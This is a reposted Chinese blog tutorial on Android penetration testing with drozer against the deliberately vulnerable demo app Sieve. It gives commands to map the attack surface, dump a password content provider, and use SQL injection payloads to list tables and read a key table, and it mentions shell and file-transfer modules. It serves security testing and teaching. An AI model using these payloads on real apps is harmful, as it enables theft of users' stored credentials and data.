利用drozer進行Android滲透測試 - AndroSecurity

原創 qiujiwuhen00 2018-09-05 03:00

利用drozer進行Android滲透測試 - AndroSecurity

時間 2014-08-12 01:10:00 博客園-原創精華區
原文  http://www.cnblogs.com/goodhacker/p/3906180.html

一、安裝與啓動

1. 安裝  

第一步:從 http://mwr.to/drozer 下載Drozer (Windows Installer) 

第二步:在 Android 設備中安裝 agent.apk

adb install agent.apk

2. 啓動

第一步:在 PC 上使用 adb 進行端口轉發,轉發到 Drozer使用的端口 31415 

adb forward tcp:31415 tcp:31415

第二步:在 Android 設備上開啓 Drozer Agent

選擇 embedded server-enable

第三步:在 PC 上開啓 Drozer console 

drozer console connect

二、測試步驟

1.獲取包名

dz> run app.package.list -f sieve

com.mwr.example.sieve

2.獲取應用的基本信息

run app.package.info -a com.mwr.example.sieve

3.確定攻擊面

run app.package.attacksurface com.mwr.example.sieve

4.Activity

1 )獲取 activity 信息 

run app.activity.info -a com.mwr.example.sieve

2 )啓動 activity 

run app.activity.start --component com.mwr.example.sieve

dz> help app.activity.start

usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY]

[--component PACKAGE COMPONENT] [--data-uri DATA_URI]

[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]

[--mimetype MIMETYPE]

5.Content Provider

1 )獲取 Content Provider 信息 

run app.provider.info -a com.mwr.example.sieve

(2)Content Providers (數據泄露)

先獲取所有可以訪問的 Uri :  

run scanner.provider.finduris -a com.mwr.example.sieve

獲取各個 Uri 的數據: 

run app.provider.query

content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

查詢到數據說明存在漏洞

(3)Content Providers SQL 注入) 

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

報錯則說明存在 SQL 注入。

列出所有表:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

獲取某個表(如 Key )中的數據: 

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

4 )同時檢測 SQL 注入和目錄遍歷 

run scanner.provider.injection -a com.mwr.example.sieve

run scanner.provider.traversal -a com.mwr.example.sieve

6.Service

(1)獲取 service 詳情 

run app.service.info -a com.mwr.example.sieve

7. 其它模塊 

shell.start 在設備上開啓一個交互shell

tools.file.upload / tools.file.download 上傳/下載文件到設備

tools.setup.busybox / tools.setup.minimalsu 安裝可用的二進制文件
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

adb shell dumpsys mminfo 命令 查看內存

qiujiwuhen00 2020-02-23 14:34:29

minfree閥值設置詳解,後臺進程管理教程

qiujiwuhen00 2020-02-23 14:34:29

[Android] 爲Android安裝BusyBox —— 完整的bash shell

qiujiwuhen00 2020-02-23 14:34:29

android app應用啓動時間監測

qiujiwuhen00 2020-02-23 14:34:29

【Android測試】【第七節】Monkey——源碼淺談

qiujiwuhen00 2018-09-05 03:00:05

Monkey log詳細分析說明

qiujiwuhen00 2018-09-05 03:00:05

Monkey log異常分析說明

qiujiwuhen00 2018-09-05 03:00:04

Android Monkey Test

qiujiwuhen00 2018-09-05 03:00:04

討論異類ANR解決之道?????

qiujiwuhen00 2018-09-05 03:00:04

ANR traces分析 系統一直出現 waiting for ...日誌

qiujiwuhen00 2018-09-05 03:00:04